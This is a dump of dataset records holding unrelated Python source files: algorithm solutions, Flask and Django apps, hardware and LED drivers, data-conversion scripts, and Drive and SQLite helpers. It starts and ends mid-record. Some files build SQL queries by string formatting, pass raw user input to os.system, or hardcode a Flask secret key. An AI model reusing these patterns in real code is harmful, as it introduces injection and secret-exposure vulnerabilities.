415\n# Dislikes: 56\n# Total Accepted: 36.8K\n# Total Submissions: 83.9K\n# Testcase Example: '[1,3,2,2,5,2,3,7]'\n#\n# We define a harmonious array is an array where the 
{"seq_id":"1043086","text":"#\n# @lc app=leetcode id=594 lang=python\n#\n# [594] Longest Harmonious Subsequence\n#\n# https://leetcode.com/problems/longest-harmonious-subsequence/description/\n#\n# algorithms\n# Easy (43.06%)\n# Likes: 415\n# Dislikes: 56\n# Total Accepted: 36.8K\n# Total Submissions: 83.9K\n# Testcase Example: '[1,3,2,2,5,2,3,7]'\n#\n# We define a harmonious array as an array where the difference between its\n# maximum value and its minimum value is exactly 1.\n# \n# Now, given an integer array, you need to find the length of its longest\n# harmonious subsequence among all its possible subsequences.\n# \n# Example 1:\n# \n# Input: [1,3,2,2,5,2,3,7]\n# Output: 5\n# Explanation: The longest harmonious subsequence is [3,2,2,2,3].\n# \n# \n# \n# Note:\n# The length of the input array will not exceed 20,000.\n# \n# \n# \n#\nclass Solution(object):\n def findLHS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n data = {}\n for n in nums:\n data[n] = data.get(n, 0) + 1\n \n max_length = 0\n for key in data:\n max_length = max(max_length, data[key]+data.get(key+1, -float(\"inf\")))\n \n return max_length\n\n\n# if __name__ == \"__main__\":\n# s = Solution()\n# print s.findLHS([1,1,1,1])\n","sub_path":"594.longest-harmonious-subsequence.py","file_name":"594.longest-harmonious-subsequence.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"570186071","text":"from threading import Thread\r\nimport time\r\nimport datetime\r\nfrom dht.node import Node\r\n\r\nclass NodeStoreHandler(object):\r\n\r\n def __init__(self, server):\r\n self._server = server\r\n\r\n # we learn about new nodes when\r\n # 1. We are queried by another node\r\n # 2. Another node responds to a find_node or get_peers that we sent\r\n\r\n server.on_query_received.append(self.on_query_received)\r\n server.on_response_received.append(self.on_response_received)\r\n server.on_query_sent.append(self.on_query_sent)\r\n\r\n def on_query_sent(self, transaction):\r\n # Only for bootstrap nodes.\r\n node = transaction.response_node\r\n if node.id_20 and node.ip and node.dht_port:\r\n self._server.remote_nodes.add(transaction.response_node)\r\n\r\n def on_query_received(self, transaction):\r\n # Add the node that is querying us.\r\n self._server.remote_nodes.add(transaction.query_node)\r\n\r\n def on_response_received(self, transaction):\r\n # Update the id of the remote node.\r\n transaction.response_node.id_20 = transaction.response[\"r\"][\"id\"]\r\n\r\n # Add the node that responded to us. We most likely already have this one.\r\n
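# --- added note (editorial comment, not from the original file) ---\r\n # \"nodes\" uses the BEP 5 compact node-info encoding: 26 bytes per node,\r\n # i.e. a 20-byte node id, a 4-byte IPv4 address and a 2-byte big-endian\r\n # port, which is why the loop below walks the blob in steps of 26.\r\n # A hedged decoding sketch for one 26-byte slice (assumes \"import struct\"):\r\n # ip = \".\".join(str(b) for b in bytearray(id_26[20:24]))\r\n # port = struct.unpack(\"!H\", id_26[24:26])[0]\r\n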
self._server.remote_nodes.add(transaction.response_node)\r\n\r\n # A find_node or get_peers response may carry extra nodes.\r\n if transaction.query[\"q\"] == 'find_node' or transaction.query[\"q\"] == 'get_peers':\r\n nodes = transaction.response[\"r\"].get(\"nodes\", \"\")\r\n\r\n for i in xrange(0, len(nodes), 26):\r\n id_26 = nodes[i:i+26]\r\n if not self._server.remote_nodes.get_node(id_26):\r\n self._server.remote_nodes.add(Node.from_id_26(id_26))\r\n\r\nclass NodeInvalidater(object):\r\n\r\n def __init__(self, server):\r\n self._server = server\r\n\r\n Thread(target=self.invalidate_nodes).start()\r\n\r\n def invalidate_nodes(self):\r\n\r\n while True:\r\n time.sleep(0.5)\r\n for transaction_id, transaction in self._server._running_transactions.items():\r\n if datetime.datetime.now() - transaction.created_at > datetime.timedelta(seconds=60):\r\n self._server.remote_nodes.ban_node(transaction.response_node)\r\n del self._server._running_transactions[transaction_id]\r\n","sub_path":"operators/node_store.py","file_name":"node_store.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"312402518","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\n\n\nclass MilesToKs(App):\n def build(self):\n self.title = \"Convert Miles to Kilometres\"\n self.root = Builder.load_file('task_1.kv')\n Window.size = (400, 200)\n return self.root\n\n def handle_increment(self, num):\n if self.root.ids.input_miles.text == \"\":\n self.root.ids.input_miles.text = str(int(0))\n try:\n self.root.ids.input_miles.text = str(int(self.root.ids.input_miles.text) + num)\n except (ValueError, TypeError):\n self.root.ids.label_kilometres.text = \"0.0\"\n\n def calculate(self):\n try:\n self.root.ids.label_kilometres.text = \"*\" + str(int(self.root.ids.input_miles.text) * 1.60)\n except ValueError:\n self.root.ids.label_kilometres.text = \"0.0\"\n\n # def display_label(self):\n # try:\n # self.root.ids.label_kilometres.text = \"*\" + str(int(self.root.ids.input_miles.text) * 1.60)\n # except ValueError:\n # self.root.ids.label_kilometres.text = \"0.0\"\n\n\nMilesToKs().run()\n","sub_path":"Prac06/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"298105614","text":"import jieba\nfrom pathlib import Path\nfrom collections import defaultdict\nfrom queue import PriorityQueue\n\nfile_in = \"../../data/couplet_dataset/merge.in.txt\"\nfile_out = \"../../data/couplet_dataset/top_{}_keywords.txt\"\nstopwords = \"../../data/couplet_dataset/stopwords.txt\"\n\n\ndef parse_stopwords(file_in):\n res = set()\n with open(file_in, 'r', encoding = 'utf-8') as fin:\n lines = fin.readlines()\n for line in lines:\n res.add(line.strip())\n return res\n\n\ndef parse_file(file_in, sw):\n freq = defaultdict(int)\n with open(file_in, 'r', encoding = 'utf-8') as fin:\n lines = fin.readlines()\n for line in lines:\n line = line.strip()\n line = line.replace(\" \", \"\")\n words = jieba.cut(line)\n for word in words:\n if word not in sw:\n freq[word] += 1\n return freq\n\n\ndef topk(file_out, freq, k = 100):\n file_out = file_out.format(k)\n pq = PriorityQueue()\n for key in freq:\n pq.put((-1 * freq[key], key))\n with open(file_out, 'w', encoding = 'utf-8') as fout:\n for i in range(k):\n neg_freq, word = pq.get() # pop exactly once per iteration; the old pq.get(i) calls each removed a fresh item\n fout.write(\"{} {}\\n\".format(word, neg_freq * -1))\n print(\"{} {}\".format(word, neg_freq * -1))\n\n\nif __name__ == \"__main__\":\n sw = parse_stopwords(stopwords)\n freq = parse_file(file_in, sw)\n topk(file_out, freq, 200)","sub_path":"nlp/preprocess/words_count.py","file_name":"words_count.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"66589187","text":"'''\nSolution: https://blog.csdn.net/fuxuemingzhu/article/details/79434100\n'''\n# Not understand\ndef singleNumber(self, nums):\n xor = 0\n num1, num2 = 0, 0\n for num in nums:\n xor ^= num\n mask = 1\n while xor & mask == 0:\n mask = mask << 1\n for num in nums:\n if num & mask == 0:\n num1 ^= num\n else:\n num2 ^= num\n return [num1, num2]\n\n# 99% in dic O(n)\ndef singleNumber(self, nums):\n dic = {}\n for i in nums:\n dic[i] = dic.get(i, 0) + 1\n if dic[i] == 2:\n del dic[i]\n return list(dic)","sub_path":"Project/Leetcode/Bit manimulation/260. Single Number III.py","file_name":"260. Single Number III.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"512102060","text":"\"\"\"\nAn example training a LogisticRegression model, performing grid search\nusing TuneGridSearchCV.\n\nThis example uses early stopping to further improve runtimes\nby eliminating worse hyperparameter choices early based off\nof its average test score from cross validation. Usually\nthis will require the estimator to have `partial_fit`, but\nwe use sklearn's `warm_start` parameter to do this here.\nWe fit the estimator for one epoch, then `warm_start`\nto pick up from where we left off, continuing until the\ntrial is early stopped or `max_iters` is reached.\n\"\"\"\n\nfrom tune_sklearn import TuneGridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\n\nx, y = load_iris(return_X_y=True)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=.2)\n\nclf = RandomForestClassifier()\nparameter_grid = {\"min_samples_split\": [2, 3, 4]}\n\ntune_search = TuneGridSearchCV(\n clf,\n parameter_grid,\n early_stopping=True,\n max_iters=20,\n)\ntune_search.fit(x_train, y_train)\n\npred = tune_search.predict(x_test)\naccuracy = np.count_nonzero(np.array(pred) == np.array(y_test)) / len(pred)\nprint(accuracy)\n","sub_path":"examples/warm_start_ensemble.py","file_name":"warm_start_ensemble.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"314783261","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom rpi_ws281x import Adafruit_NeoPixel\nfrom rpi_ws281x import Color\n\nclass Leds:\n def __init__(self, count, pin=21, br=100):\n \"\"\"\n LEDs\n \"\"\"\n self.LED_COUNT = count\n LED_PIN = pin # GPIO pin that the LED strip is connected to\n LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\n LED_DMA = 10 # DMA channel to use for generating signal (try 10)\n LED_BRIGHTNESS = br # Set to 0 for darkest and 255 for brightest\n LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\n LED_CHANNEL = 0 # Set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n self.strip = Adafruit_NeoPixel(self.LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT)\n self.strip.begin()\n
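# --- added usage sketch (editorial comment; the values below are assumptions) ---\n # leds = Leds(30) # a 30-pixel strip on the default GPIO 21\n # leds.setPixelsColor(Color(255, 0, 0)) # paint the whole strip red\n # leds.colorWipe(Color(0, 0, 255), wait_ms=20) # then wipe it to blue\n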
def setPixelsColor(self, color):\n for i in range(self.strip.numPixels()):\n self.strip.setPixelColor(i, color)\n self.strip.show()\n\n def setPixelColor(self, i, color): # added the pixel index parameter; the body referenced an undefined name i\n self.strip.setPixelColor(i, color)\n self.strip.show()\n\n def colorWipe(self, color, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(self.strip.numPixels()):\n self.strip.setPixelColor(i, color)\n self.strip.show()\n time.sleep(wait_ms/1000.0)","sub_path":"demo_task/Leds.py","file_name":"Leds.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"21484014","text":"from django.test import TestCase\nfrom . import factories\n\n\nclass TestGame(TestCase):\n def test_factory(self):\n game = factories.GameFactory(name=\"Quake 3 Arena\")\n self.assertEqual(game.slug, \"quake-3-arena\")\n self.assertFalse(game.is_public)\n\n\nclass TestGameLibrary(TestCase):\n def test_library_generated_by_user(self):\n user = factories.UserFactory(first_name=\"test\")\n\n library = user.gamelibrary\n self.assertEqual(len(library.games.all()), 0)\n for i in range(5):\n game = factories.GameFactory()\n library.games.add(game)\n\n self.assertEqual(len(library.games.all()), 5)\n\n def test_library_generated_by_factory(self):\n games = [factories.GameFactory() for i in range(5)]\n library = factories.GameLibraryFactory(games=games)\n self.assertEqual(len(library.games.all()), 5)\n","sub_path":"games/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"578303932","text":"import argparse\n\nfrom root_numpy import root2array\n\nimport numpy as np\nimport h5py\nfrom tqdm import tqdm\n\nfrom rnn_tauid.common import cuts\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"outfile\",\n help=\"Output file\")\n parser.add_argument(\"selection\",\n choices=[\"truth1p\", \"1p\",\n \"truth3p\", \"3p\",\n \"truthXp\", \"Xp\"],\n help=\"Selection to apply to the taus\")\n parser.add_argument(\"infiles\", nargs=\"+\",\n help=\"Input root files with flattened containers\")\n\n return parser.parse_args()\n\n\n# Global config\ntreename = \"CollectionTree\"\ndefault_value = 0\nn_tracks = 12\nn_clusters = 8\n\n\n# h5py dataset kwargs\nh5opt = {\n \"compression\": \"gzip\",\n \"compression_opts\": 9,\n \"shuffle\": True,\n \"fletcher32\": True\n}\n\n\nif __name__ == \"__main__\":\n args = get_args()\n\n # Load here to avoid root taking over the command line\n from root_numpy import root2array, list_branches\n\n # Branches to load\n branches = list_branches(args.infiles[0], treename=treename)\n jet_branches = [br for br in branches if br.startswith(\"TauJets\")]\n track_branches = [br for br in branches if br.startswith(\"TauTracks\")]\n cluster_branches = [br for br in branches if br.startswith(\"TauClusters\")]\n\n # Tau selection\n sel = cuts.sel_dict[args.selection]\n\n with h5py.File(args.outfile, \"w\", driver=\"family\", memb_size=10*1024**3) as outf:\n # Number of events after selection\n n_events = None\n seed = 1234567890\n\n # Jet\n for br in tqdm(jet_branches, desc=\"Jets\"):\n data = root2array(args.infiles, treename=treename, branches=br,\n selection=sel)\n data = data.astype(np.float32)\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n
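# Added note: a fresh RandomState is rebuilt from the same fixed seed for\n # every branch, so shuffle() applies the identical permutation each time\n # and event rows stay aligned across all datasets written to the file.\n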
outf.create_dataset(\"{}/{}\".format(*br.split(\".\")), data=data,\n dtype=np.float32, **h5opt)\n\n # Track\n mask = root2array(args.infiles, treename=treename,\n branches=(\"TauTracks.pt\", default_value, n_tracks),\n selection=sel)\n mask = mask <= 0\n\n for br in tqdm(track_branches, desc=\"Tracks\"):\n data = root2array(args.infiles, treename=treename,\n branches=(br, default_value, n_tracks),\n selection=sel)\n data = data.astype(np.float32)\n\n # Set nan\n data[mask] = np.nan\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n outf.create_dataset(\"{}/{}\".format(*br.split(\".\")),\n data=data, dtype=np.float32, **h5opt)\n\n # Cluster\n mask = root2array(args.infiles, treename=treename,\n branches=(\"TauClusters.et\", default_value, n_clusters),\n selection=sel)\n mask = mask <= 0\n\n for br in tqdm(cluster_branches, desc=\"Clusters\"):\n data = root2array(args.infiles, treename=treename,\n branches=(br, default_value, n_clusters),\n selection=sel)\n data = data.astype(np.float32)\n\n # Set nan\n data[mask] = np.nan\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n outf.create_dataset(\"{}/{}\".format(*br.split(\".\")),\n data=data, dtype=np.float32, **h5opt)\n","sub_path":"scripts/create_sample.py","file_name":"create_sample.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512827708","text":"from django.shortcuts import render, render_to_response, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template import loader, RequestContext\n\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nimport os\nimport logging\n\nfrom .models import *\n\nfrom .forms import *\n\nlogger = logging.getLogger(__name__)\n\ndef index(request):\n contact_form = ContactForm\n portfolio_section = PortfolioSection.objects.all()[:6]\n\n header_section = HeaderSection.objects.filter(pk=1).values('master_heading', 'sub_heading')[0]\n about_section = AboutSection.objects.filter(pk=1).values()[0]\n master_heading = header_section['master_heading']\n sub_heading = header_section['sub_heading']\n programming_language_list = about_section['programming_language'].split(',')\n database_management_list = about_section['database_management'].split(',')\n markup_and_styling_language_list = about_section['markup_and_styling_language'].split(',')\n framework_list = about_section['framework'].split(',')\n\n return render(request, 'index.html', \n {'contact_form': contact_form, 'portfolio_section': portfolio_section, 'master_heading': master_heading, 'sub_heading': sub_heading,\n 'programming_language_list': programming_language_list, 'database_management_list': database_management_list, \n 'markup_and_styling_language_list': markup_and_styling_language_list, 'framework_list': framework_list})\n\ndef send_message(request):\n if request.method == 'POST':\n try:\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n name = request.POST['name']\n email = 
request.POST['email']\n message = request.POST['message']\n\n content = 'Name: %s\\nEmail: %s\\nMessage: %s' % (name, email, message)\n message = Mail(\n from_email='contact.alpolinar@shaw.ca',\n to_emails='alpolinar@gmail.com',\n subject=\"New message from portfolio site.\", \n html_content=content)\n try:\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n response = sg.send(message)\n return HttpResponse(response.status_code)\n except Exception as e:\n logger.error('sg: %s', e)\n return HttpResponse('sent')\n else:\n return HttpResponse('not valid')\n except Exception as e:\n logger.error('error: %s', str(e))\n else:\n return HttpResponse('test')\n return HttpResponse('default')\n\ndef handler404(request, *args, **argv):\n response = render(request, '404.html')\n response.status_code = 404\n return response\n\ndef handler500(request, *args, **argv):\n response = render(request, '500.html')\n response.status_code = 500\n return response","sub_path":"project_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634893778","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Examples for the NURBS-Python Package\n Released under MIT License\n Developed by Onur Rauf Bingol (c) 2016-2017\n\n This example is contributed by John-Eric Dufour (@jedufour)\n\"\"\"\n\nfrom nurbs import Surface as ns\nfrom nurbs import utilities as utils\nfrom nurbs import factories as fact\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Create a NURBS surface instance\n#surf = fact.from_file(\"data/CP_Surface1.json\")\nsurf = fact.from_file(\"data/CP_Surface2.json\")\nsurf.evaluate()\n\n# Arrange calculated surface data for plotting\nsurfpts_x = []\nsurfpts_y = []\nsurfpts_z = []\nfor spt in surf.surfpts:\n surfpts_x.append(spt[0])\n surfpts_y.append(spt[1])\n surfpts_z.append(spt[2])\n\n# Plot using Matplotlib\nfig = plt.figure(figsize=(10.67, 8), dpi=96)\nax = fig.gca(projection='3d')\n#surfplt = ax.scatter(surfpts_x, surfpts_y, surfpts_z, c=\"red\", s=10, depthshade=True) # 3D Scatter plot\nsurfplt = ax.plot_trisurf(surfpts_x, surfpts_y, surfpts_z, cmap=plt.cm.viridis) # 3D Tri-Surface plot\nax.set_xlim(-25, 25)\nax.set_ylim(-25, 25)\nax.set_zlim(-15, 15)\nplt.show()\n\nprint(\"End of NURBS-Python Example\")\n","sub_path":"ex_surface04.py","file_name":"ex_surface04.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370653305","text":"from card import Card, Suit\nfrom deck import Deck\n\nif __name__ == \"__main__\":\n deck = Deck.empty()\n\n # Add first card, ace of spades\n deck.add_after(None, Card(Suit.SPADES, 1))\n\n # Add J of Diamonds before the previous one\n # It becomes the head of the deck\n deck.add_before(deck.head.card, Card(Suit.DIAMONDS, 11))\n\n # Add 2 of Hearts after J of Diamonds\n deck.add_after(deck.head.card, Card(Suit.HEARTS, 2))\n\n # Add 4 of Clubs after 2 of Hearts\n deck.add_after(Card(Suit.HEARTS, 2), Card(Suit.CLUBS, 4))\n\n # Add 9 of Diamonds before 2 of Hearts\n deck.add_before(Card(Suit.HEARTS, 2), Card(Suit.DIAMONDS, 9))\n\n # Remove 4 of Clubs from the deck\n deck.delete(Card(Suit.CLUBS, 4))\n\n # Try to find 4 of Clubs\n four_of_clubs = deck.find(Card(Suit.CLUBS, 4))\n\n # Find J of Diamonds\n j_of_diamonds = deck.find(Card(Suit.DIAMONDS, 11))\n\n print(f'Found 4 of Clubs? {four_of_clubs}')\n print(f'Found J of Diamonds? 
{j_of_diamonds}')\n\n # Uncomment the two lines below to get a full deck\n # deck = Deck.empty()\n # deck.fill()\n\n \"\"\" deck.add_after(None, Card(Suit.CLUBS, 4))\n print(f'Head: {deck.head}')\n\n deck.add_before(Card(Suit.CLUBS, 4), Card(Suit.DIAMONDS, 11))\n\n print(f'Head: {deck.head}')\n print(f'Tail: {deck.tail}') \"\"\"\n\n deck.traverse_backwards()","sub_path":"Part_A/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"547200726","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 27 09:41:33 2015\n\n@author: nicolas\n\"\"\"\n\nfrom __future__ import division\n\nimport json as j\n\nimport pylab as pl\n\nimport lib.physical_model as pm\nfrom lib.EngineClass import SolverClass\nfrom lib.path_project import conf_dir\n\nModel = pm.Chris2DModel\nmodelname = 'Saint_Venant_vg_hydro2fields'\n\ntry:\n conf = j.load(open(conf_dir / 'data_%s.json' % modelname, 'r'))\nexcept:\n from lib.configclass import ConfigWindow\n conf_windows = ConfigWindow().configure_traits()\n conf = conf_windows.get()\n\nphysical_data = conf['physical']\nnumerical_conf = conf['numerical']\nsolver_conf = conf['solver']\nsurface = conf['surface']\ninitial = conf['initial']\n\nmodel = Model()\n\n# print(sp.printing.fcode(model.dummy_time_syseq.values()[1], standard=95))\n\n##########################\n\nsolver = SolverClass(model)\npl.ion()\nsolver.update_initial_fields(conf)\nsolver.start()\n","sub_path":"info_models.py","file_name":"info_models.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"94033718","text":"\nfrom flask import Flask\nfrom flask import request,render_template\nfrom flask_json import FlaskJSON, JsonError, json_response, as_json\nimport serial \nimport time\n\n\napp = Flask(__name__)\nFlaskJSON(app)\n\narduino = serial.Serial('/dev/ttyACM1', 9600)\n\n\ndef onOffFunction(command):\n\tif command ==\"on\":\n\t\tprint(\"Opening the door...\")\n\t\ttime.sleep(1) \n\t\tarduino.write(b'H') \n\telif command ==\"off\":\n\t\tprint(\"Closing the door...\")\n\t\ttime.sleep(1) \n\t\tarduino.write(b'L')\n\telif command ==\"bye\":\n\t\tprint(\"Goodbye!...\")\n\t\ttime.sleep(1) \n\t\tarduino.close()\n\n\n@app.route(\"/controller\", methods=['GET'])\ndef onOffArduino():\n if(request.args.get('command') == \"on\"):\n onOffFunction(\"on\")\n return json_response(status=200)\n elif(request.args.get('command') == \"off\"):\n onOffFunction(\"off\")\n return json_response(status=200)\n else:\n return json_response(status=404)\n\n@app.route(\"/\", methods=['GET'])\ndef home():\n return render_template(\"index.html\")\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"117046725","text":"import os\r\nimport time\r\nos.system(\"echo please type yes in the selection of choices\")\r\nsource = input(\"type the drive you would like to copy from:\")\r\ndestination = input(\"type the drive you would like to copy to:\")\r\nos.system(\"xcopy /v \" + source + \" \" + destination)\r\ntime.sleep(3)\r\nos.system(\"pause\")\r\nos.system(\"echo Done copying.\")\r\n\r\n\r\n 
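\r\n# --- added sketch (editorial comment): a shell-free alternative to xcopy ---\r\n# import shutil\r\n# shutil.copytree(source, destination, dirs_exist_ok=True) # dirs_exist_ok needs Python 3.8+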
\r\n","sub_path":"copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"166582916","text":"import os\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n\nclass DriveFileStream:\n def __init__(self):\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n gauth = GoogleAuth()\n gauth.LocalWebserverAuth()\n self.drive = GoogleDrive(gauth)\n self.rootPath = \"1UYFcpHPmQCjYGCaPeCYtRaUHR05hvV-h\"\n self.rawPath = \"1fBnc2kKf0msus4N7-TYZEUha503pgtly\"\n self.minifyPath = \"1wMQQIUNx5qKkkZth-cjfypWqtAj-Ys6J\"\n self.errorLogPath = \"1aRaYF9-erEV-Vnya36eRzLl43MVpgZw9\"\n\n def get_id(self, path):\n dirid = \"\"\n folder, title = path.split(\"/\")\n if folder == \"raw\":\n dirid = self.rawPath\n elif folder == \"minify\":\n dirid = self.minifyPath\n elif folder == \"root\":\n dirid = self.rootPath\n elif folder == \"errorLog\":\n dirid = self.errorLogPath\n return dirid, title\n\n def search_cloud_file(self, path):\n dirid, title = self.get_id(path)\n file_list = self.drive.ListFile({\"q\": \"'%s' in parents and title = '%s'\" % (dirid, title)}).GetList()\n return file_list\n\n def get_file(self, path):\n file_list = self.search_cloud_file(path)\n if len(file_list) != 0:\n file = self.drive.CreateFile({\"id\": file_list[0][\"id\"]})\n return file\n else:\n dirid, title = self.get_id(path)\n file = self.drive.CreateFile({\"parents\": [{\"id\": dirid}], \"title\": title})\n return file\n\n def load_file(self, path):\n file = self.get_file(path)\n return file.GetContentString()\n\n def save_file(self, path, content):\n file = self.get_file(path)\n file.SetContentString(content)\n file.Upload()\n\n\ndrive = DriveFileStream()\ndrive.save_file(\"errorLog/hoge.txt\", \"hogehoge\")\n","sub_path":"DriveFileStream.py","file_name":"DriveFileStream.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272823277","text":"from flask import Flask, render_template, url_for\nfrom forms import RegistrationForm, QuizzerLoginForm\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'dsafbhj34y678bdfvehy3487b'\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html', title='Home')\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n return render_template('register.html', title='Register', form=form)\n\n@app.route(\"/quizzerlogin\")\ndef quizzerlogin():\n form = QuizzerLoginForm()\n return render_template('quizzerlogin.html', title='Quizzer Login', form=form)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"quizapp.py","file_name":"quizapp.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494198615","text":"import sqlite3\n\nclass SqliteManager:\n def __init__(self, db_name, table_name):\n self.db_name = db_name\n self.table_name = table_name\n self.connector = sqlite3.connect(self.db_name)\n\n\n def __del__(self):\n self.connector.close()\n\n\n def set_table_name(table_name):\n self.table_name = table_name\n\n\n def select_all(self):\n sql = \"select * from %s\" % self.table_name\n cursor = self.connector.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n\n for row in 
result:\n print(\"===== Hit! =====\")\n for column in row:\n print(column)\n\n cursor.close()\n\n\n def select(self, columns):\n sql = \"select %s from %s\" % (columns, self.table_name)\n cursor = self.connector.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n\n for row in result:\n print(\"===== Hit! =====\")\n for column in row:\n print(column)\n\n cursor.close()\n\n\n def insert(self, columns, values):\n sql = \"insert into %s(%s) values(%s)\" % (self.table_name, columns, values)\n self.connector.execute(sql)\n self.connector.commit()\n","sub_path":"python/SqliteManager.py","file_name":"SqliteManager.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367883707","text":"import json\n\n\nclass Tree_structure:\n \"\"\"\n Tree structure use in the algorithm\n tree: tree structure\n tree_data: external data need it\n \"\"\"\n\n def __init__(self, nums):\n self.tree = {}\n self.tree_data = []\n self.num1 = nums[0]\n self.num2 = nums[1]\n\n def __getitem__(self, item):\n \"\"\"\n Get element of the tree like an array or tree\n :param item: index of element (can be a int or a str)\n :return: The elemt\n \"\"\"\n item = str(item)\n return self.tree[item]\n\n def __setitem__(self, item, value):\n \"\"\"\n Set element of the tree with a value\n :param item: index of the element (can be a int or a str)\n :param value: value of the element\n :return:\n \"\"\"\n item = str(item)\n self.tree[item] = value\n\n def __len__(self):\n return len(self.tree)\n\n def save(self, path):\n \"\"\"\n Save the tree in a json file\n :param path: path where to save the json file\n :return:\n \"\"\"\n aux = {}\n # We need to convert floats into string for JSON\n for j, t in enumerate(self.tree):\n aux[j] = self.tree[t]\n aux[j]['point'] = list([str(i) for i in aux[j]['point']])\n aux[j]['mu'] = list([str(i) for i in aux[j]['mu']])\n aux[j]['std'] = list([str(i) for i in aux[j]['std']])\n\n with open(path + str(self.num1) + \"-\" + \\\n str(self.num2) + '.json', 'w') as f:\n json.dump(aux, f)","sub_path":"src/python_code/compostela/tree_structure.py","file_name":"tree_structure.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"387378146","text":"import random\n\ndef lotePrioridadCreciente(cantTareas, salida, gapTareas, durTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(5):\n for k in reversed(range(1,mod+1)):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(5-i)+' '+str(durTareas*k)+'\\n')\n tiempo += gapTareas\n\ndef 